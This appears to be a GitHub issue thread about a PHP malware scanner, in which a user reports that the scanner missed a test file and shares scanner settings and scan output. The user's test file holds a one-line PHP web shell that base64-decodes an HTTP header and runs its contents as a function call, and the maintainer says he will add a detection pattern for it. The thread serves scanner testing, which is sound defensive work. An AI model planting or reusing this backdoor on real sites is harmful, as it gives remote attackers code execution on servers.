Closed paulijmker closed 2 years ago
The code part @$x[0]($x[1]);
looks really odd will add a pattern for it.
What is yours script name? Maybe this cause some interference, but will look into this issue too shortly.
You have to specify the false flag to tell not in CLI mode ex.: $scan = new MalwareScanner(false);
Definitions updated.
Thank you, it's working now!!
I got the scanner running via PHP. I have added a file called "cyb3rsh3ll.php" in the theme folder of WordPress. Inside the PHP code:
<?$x=explode('~',base64_decode(substr(numberheaders()['x'],1)));@$x[0]($x[1]);
This already looks like Mailware but when I run the test I get no error message, just OK???
My full script:
$scan = new MalwareScaner();
$scan->setExtensions(array('.php', '.js'));
$scan->addWordpressChecksums('5.9.2');
$scan->setFlagHideWhitelist(true);
$scan->setFlagHideOk(true);
$scan->setFlagCombinedWhitelist(true);
$scan->run(ABSPATH);
Also I see that the script with above code is executed twice. A full printout with all results and a printout with only the ER results, how to solve this?
result:
... (loading all the OK and ER descriptions) [32m# OK[0m # {/home/domain/domains/domain.nl/public_html/xmlrpc.php} [32m# OK[0m # {/home/domain/domains/domain.nl/public_html/wp-comments-post.php} [32m# OK[0m # {/home/domain/domains/domain.nl/public_html/wp-links-opml.php} [32m# OK[0m # {/home/domain/domains/domain.nl/public_html/wp-config.php} Start time: 2022-03-24 15:36:48 End time: 2022-03-24 15:36:54 Total execution time: 6 Base directory: /home/domain/domains/domain.nl/public_html Total directories scanned: 614 Total files scanned: 2092 Total malware identified: 3 Combined whitelist records count: 88134
[31m# ER[0m # {/home/domain/domains/domain.nl/public_html/wp-content/plugins/seo-by-rank-math/assets/vendor/select2/select2.min.js} [31m# ER[0m # {/home/domain/domains/domain.nl/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php} Start time: 2022-03-24 15:36:57 End time: 2022-03-24 15:37:01 Total execution time: 4 Base directory: /home/domain/domains/domain.nl/public_html/ Total directories scanned: 1228 Total files scanned: 4826 Total malware identified: 5